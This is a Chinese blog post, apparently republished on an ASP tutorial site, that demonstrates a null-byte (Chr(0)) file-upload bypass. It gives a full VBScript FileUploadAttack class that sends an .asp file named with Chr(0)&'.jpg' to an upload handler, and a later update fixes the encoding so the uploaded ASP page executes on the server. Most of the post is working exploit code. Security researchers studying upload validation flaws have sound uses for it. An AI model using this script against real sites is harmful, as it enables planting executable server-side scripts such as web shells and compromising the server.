当前位置:首页 > ASP教程 > ASP其他

ASP上传漏洞之利用CHR(0)绕过扩展名检测脚本

今天Demon 提到了这个问题,正好想到之前看到的一篇文章《Automatic file upload using IE+ADO without user interaction - VBSscript》 。这篇文章给出了本地无交互自动上传脚本的示例,正好今天可以借来一用,原脚本利用了InternetExplorer.Application组件,我改写了一下,用WinHttp.WinHttpRequest.5.1实现了类似的功能,关于这个组件更多的用法请参考《WinHttpRequest Object Reference》 。
代码如下:

<BR />Option Explicit <br /><br />Function file_get_contents(filename) <BR />Dim fso, f <BR />Set fso = WSH.CreateObject("Scripting.FilesystemObject") <BR />Set f = fso.OpenTextFile(filename, 1) <BR />file_get_contents = f.ReadAll <BR />f.Close <BR />Set f = Nothing <BR />Set fso = Nothing <BR />End Function <br /><br />' 代码修改自 http://www.51frw.cn/tips/detpg_uploadvbsie/ <BR />Class FileUploadAttack <BR />Private m_objWinHttp <BR />Private m_strUrl <BR />Private m_strFieldName <br /><br />Private Sub Class_Initialize() <BR />Set m_objWinHttp = WSH.CreateObject( _ <BR />"WinHttp.WinHttpRequest.5.1") <BR />End Sub <br /><br />Private Sub Class_Terminate() <BR />Set m_objWinHttp = Nothing <BR />End Sub <br /><br />Public Sub setUrl(url) <BR />m_strUrl = url <BR />End Sub <br /><br />Public Sub setFieldName(name) <BR />m_strFieldName = name <BR />End Sub <br /><br />'Infrormations In form field header. <BR />Function mpFields(FieldName, FileName, ContentType) <BR />Dim MPTemplate 'template For multipart header <BR />MPTemplate = "Content-Disposition: form-data; name=""{field}"";" + _ <BR />" filename=""{file}""" + vbCrLf + _ <BR />"Content-Type: {ct}" + vbCrLf + vbCrLf <BR />Dim Out <BR />Out = Replace(MPTemplate, "{field}", FieldName) <BR />Out = Replace(Out, "{file}", FileName) <BR />mpFields = Replace(Out, "{ct}", ContentType) <BR />End Function <BR />'Converts OLE string To multibyte string <BR />Function StringToMB(S) <BR />Dim I, B <BR />For I = 1 To Len(S) <BR />B = B & ChrB(Asc(Mid(S, I, 1))) <BR />Next <BR />StringToMB = B <BR />End Function <br /><br />'Build multipart/form-data document with file contents And header info <BR />Function BuildFormData(FileContents, Boundary, _ <BR />FileName, FieldName) <BR />Dim FormData, Pre, Po <BR />Const ContentType = "application/upload" <br /><br />'The two parts around file contents In the multipart-form data. <BR />Pre = "--" + Boundary + vbCrLf + mpFields(FieldName, _ <BR />FileName, ContentType) <BR />Po = vbCrLf + "--" + Boundary + "--" + vbCrLf <br /><br />'Build form data using recordset binary field <BR />Const adLongVarBinary = 205 <BR />Dim RS: Set RS = WSH.CreateObject("ADODB.Recordset") <BR />RS.Fields.Append "b", adLongVarBinary, _ <BR />Len(Pre) + LenB(FileContents) + Len(Po) <BR />RS.Open <BR />RS.AddNew <BR />Dim LenData <BR />'Convert Pre string value To a binary data <BR />LenData = Len(Pre) <BR />RS("b").AppendChunk (StringToMB(Pre) & ChrB(0)) <BR />Pre = RS("b").GetChunk(LenData) <BR />RS("b") = "" <br /><br />'Convert Po string value To a binary data <BR />LenData = Len(Po) <BR />RS("b").AppendChunk (StringToMB(Po) & ChrB(0)) <BR />Po = RS("b").GetChunk(LenData) <BR />RS("b") = "" <br /><br />'Join Pre + FileContents + Po binary data <BR />RS("b").AppendChunk (Pre) <BR />RS("b").AppendChunk (FileContents) <BR />RS("b").AppendChunk (Po) <BR />RS.Update <BR />FormData = RS("b") <BR />RS.Close <BR />BuildFormData = FormData <BR />End Function <br /><br /><BR />Public Function sendFile(fileName) <BR />Const Boundary = "---------------------------0123456789012" <BR />m_objWinHttp.Open "POST", m_strUrl, False <BR />m_objWinHttp.setRequestHeader "Content-Type", _ <BR />"multipart/form-data; boundary=" + Boundary <br /><br />Dim FileContents, FormData <BR />'Get source file As a binary data. <BR />FileContents = file_get_contents(FileName) <br /><br />' 下面构造了恶意文件扩展名Chr(0) & .jpg <BR />'Build multipart/form-data document <BR />FormData = BuildFormData(FileContents, Boundary, _ <BR />FileName & Chr(0) & ".jpg", m_strFieldName) <br /><br />m_objWinHttp.send FormData <BR />sendFile = m_objWinHttp.Status <BR />End Function <br /><br />Public Function getText() <BR />getText = m_objWinHttp.ResponseText <BR />End Function <BR />End Class <br /><br />Function VBMain() <BR />VBMain = 0 <br /><br />Dim fileUpload <BR />Set fileUpload = New FileUploadAttack <BR />' 需要修改下面内容为合适内容 <BR />' 上传url <BR />fileUpload.setUrl "http://localhost/upload/uploadfile.asp" <BR />fileUpload.setFieldName "filepath" ' 上传表单框的name <BR />' 需上传文件路径 <BR />If fileUpload.sendFile("E:projectsaspindex.asp")=200 Then <BR />MsgBox "上传成功" & fileUpload.getText() <BR />Else <BR />MsgBox "失败" <BR />End If <BR />Set fileUpload = Nothing <BR />End Function <br /><br />Call WScript.Quit(VBMain()) <BR /><BR />上传功能是随便在网上找的一个简单上传ASP文件,然后加入我在文章中《ASP/VBScript中CHR(0)的由来以及带来的安全问题》所述的GetFileExtensionName判断扩展名是否是jpg。 <br /><br />测试结果是:手动上传asp,失败;利用上述攻击脚本上传asp文件,成功!在上传目录中确实是asp文件,通过浏览器URL也能访问这个asp文件,只是奇怪的是显示一片空白,我这里是IIS 7,难道是IIS版本问题,或许是file_get_contents应该返回文件的二进制流?好了,这个问题先搁在这儿,还有其他事,先闪了。 <br /><br />所有实验代码包,在这里upload.zip(代码BUG参考下面更新说明)下载。 <br /><br />2011年12月25日更新 <br /><br />根据大家反馈的上传文件变成Unicode Little Endian编码问题,首先抱歉的是当时确实偷懒了,主要代码参考的老外的,而且老外说明了一下GetFile这个函数获取文件二进制数据,没找到这个函数实现,也懒得去弄二进制读取,直接搞了个file_get_contents获取文本数据,事实证明这样确实存在问题,下面我把补救措施说明一下吧,还是偷懒一下,直接在现有的基础上将文本数据转换为二进制数据。使用ADODB.Stream组件,函数如下: <br /><br /><span><U></U></span> 代码如下:
<BR />' 将指定charset的字符串str转换为二进制 <BR />Function strtobin(str, charset) <BR />With WSH.CreateObject("ADODB.Stream") <BR />.Type = 2 <BR />.Mode = 3 <BR />.Open <BR />.Charset = charset <BR />.WriteText str <BR />.Flush <BR />.Position = 0 <BR />.Type = 1 <br /><br />strtobin = .Read() <BR />.Close <BR />End With <BR />End Function <BR /> <BR />然后将上述代码的第106行改成下面这样(以ASCII读取文本): <br /><br /><span><U></U></span> 代码如下:
<BR />FileContents = strtobin(file_get_contents(FileName), "ASCII") <BR /> <BR />这样改过后上传的ASP文件就是普通编码的文件了,然后浏览器访问这个文件,可以看到该ASP被成功解析。 <br /><br />不过这里觉得啰嗦了一点,其实可以直接以二进制打开文件并返回数据,这里进行了两步:1.以文本方式读取文件;2.将文本转换为二进制数据。一步到位的代码可以参考下面一次以二进制Byte()方式读取文件数据的函数: <br /><br /><span><U></U></span> 代码如下:
<BR />'Returns file contents As a binary data <BR />Function GetFile(FileName) <BR />Dim Stream: Set Stream = CreateObject("ADODB.Stream") <BR />Stream.Type = 1 'Binary <BR />Stream.Open <BR />Stream.LoadFromFile FileName <BR />GetFile = Stream.Read <BR />Stream.Close <BR />Set Stream = Nothing <BR />End Function <BR /> <BR />更优化的代码我就不写了,主要说明的是一个上传思路,如果大家希望得到完善的上传实现,可以参考Demon的《VBS模拟POST上传文件》 。<BR />原文: //www.51frw.cn/article/26103.htm
            
            


           
                
                                                

【说明】本文章由站长整理发布,文章内容不代表本站观点,如文中有侵权行为,请与本站客服联系(QQ:254677821)!